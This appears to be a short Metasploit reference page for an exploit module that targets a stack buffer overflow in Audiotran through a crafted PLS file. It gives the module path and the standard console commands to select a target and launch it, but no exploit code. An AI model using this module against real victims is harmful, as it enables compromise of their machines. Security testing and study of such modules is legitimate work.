Audiotran PLS File Stack Buffer Overflow

This module exploits a stack-based buffer overflow in Audiotran An attacker must send the file to victim and the victim must open the file. Alternatively, it may be possible to execute code remotely via an embedded PLS file within a browser when the PLS extension is registered to Audiotran. This alternate vector has not been tested and cannot be exercised directly with this module.

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use exploit/windows/fileformat/audiotran_pls_1424
msf exploit(audiotran_pls_1424) > show targets
msf exploit(audiotran_pls_1424) > set TARGET < target-id >
msf exploit(audiotran_pls_1424) > show options
    ...show and set options...
msf exploit(audiotran_pls_1424) > exploit

Time is precious, so I don’t want to do something manually that I can automate. Leveraging the Metasploit Framework when automating any task keeps us from having to re-create the wheel as we can use the existing libraries and focus our efforts where it matters.
